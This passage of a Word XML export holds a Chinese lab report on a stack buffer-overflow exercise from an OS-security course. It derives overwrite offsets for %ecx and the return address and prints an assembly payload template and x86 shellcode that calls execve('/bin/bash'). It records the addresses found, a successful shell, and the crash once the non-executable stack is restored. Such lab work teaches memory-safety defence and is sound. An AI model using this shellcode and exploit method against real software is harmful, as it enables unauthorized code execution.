        <w:t xml:space="preserve">这条指令非常关键，它直接决定了 ret 指令的返回地址到底在哪，因此，在设计攻击 payload 时，还需要覆写栈帧中 %ecx 的值，将 %esp 恢复为 ret addr1 的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">得到关键栈缓冲区的覆写公式：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%ecx - 0x4 = &amp;ret addr1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，保证 %esp 恢复后指向 ret addr1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ret addr1 = input + 0x104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，保证 ret 指令执行后控制流跳转到 shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;ret addr = %ebp + 0x4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf = %ebp - 0x88</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">是 payload 的头部长度。整理后得到：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%ecx = buf + 0x90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret addr1 = input + 0x104</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="39" w:name="shellcode-代码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shellcode 代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shellcode 代码包括 2 个部分：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">头部的作用是实施缓冲区溢出，主要包括覆写数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">主体的作用是利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">系统调用启动一个 shell</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="头部"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">头部</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">以下是 shellcode 头部的模板：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">head0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;- begin of buf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.rept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0x84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.byte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.endr</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.long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[%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&lt;- %ecx - 0x4 = &amp;ret addr = %ebp + 0x4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.long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0xffffffff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&lt;- %ebp = anything</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.long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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr1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&lt;- ret addr1 = input + 0x104</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.byte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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.org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0x104</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">覆写成功后，栈中的数据布局将变为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;--\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| [ret addr1] |    |  ret addr1 =/= ret addr0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+    \-------\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  0xffffffff |            |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ebp |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   [%ecx]    | -----------/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| 0xff...0xff |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- buf = %esp - 0x88</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">方括号中的内容是需要根据程序的实际运行情况进行修改的内容，两个部分应该填写值的计算方法已经在前面给出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="主体"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">主体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shellcode 的主体部分为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;sys/syscall.h&gt;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PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#define STRING	"/bin/bash\0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.org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0x104</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">main: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    calladdr</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">popladdr: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prepare arg0: syscall number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movl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    $SYS_execve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prepare arg1: pathname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popl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esi points to string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movl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ebx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prepare arg2: argv[]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movl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    $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argv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string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addl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                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ecx points to argv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movl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(%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set up argv[0] pointer to pathname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prepare arg3: envp[]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movl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    $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envp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string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addl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                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># edx points to envp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execve("/bin/bash", ["/bin/bash", NULL], [NULL])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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">x80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">calladdr: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 popladdr</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">string: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.string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> STRING</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.align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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">argv: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.long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envp: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.long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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">主体部分从 payload 的 0x104 偏移处开始，当 payload 注入到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中后，对应的地址为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">input + 0x104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，也就是借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">覆写的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret addr1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">标签开始，经过了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jmp calladdr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call popladdr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">两次跳转后才真正进入系统调用参数的准备环节。这是因为这段代码被加载到了栈上，必须采用位置无关的相对寻址方式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">指令会将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">string:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">标号在栈上的地址压栈，配合后面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">popl %esi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">直接获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">string:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">加载后的地址。后面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">argv:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">envp:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">都是利用它们与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">string:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的相对地址计算得到的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shellcode 最终构造了参数为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve("/bin/bash", ["/bin/bash", NULL], [NULL])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的一次系统调用，如果执行成功，则将启动一个 bash。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="55" w:name="实验结果"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">实验结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">首先通过先注入一个大小相同，但地址均为不定值的 payload 确定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和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的地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1340083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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/perpare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0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通过上图得知</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf = 0xffffcc80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">input = 0xffffc480</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，从而：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%ecx = buf + 0x88 + 0x4 + 0x4 = 0xffffcd10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ret addr1 = input + 0x104 = 0xffffc584</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">因此修改 shellcode 的头部：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1937634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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/shellcode-head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7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实施攻击，这里成功启动了 bash 并可以运行命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1194381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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/hacked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4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开启数据执行保护机制，即去掉 gcc 的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z execstack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">选项，并将头部地址修改，重新运行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1500012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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/sigsegv-hea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0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475556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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/sigsegv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5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程序收到了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIGSEGV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">信号，被终止执行，出错的地址为 shellcode 的起始地址，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffbfd0 + 0x104 = 0xffffc0d4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="57" w:name="参考"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cs6265 实验手册</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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32" Target="media/rId32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6" Target="media/rId26.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId56" Target="https://tc.gts3.org/cs6265/2021/tut/tut02-warmup2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6" Target="https://tc.gts3.org/cs6265/2021/tut/tut02-warmup2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2024-04-16T06:04:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-16T06:04:01Z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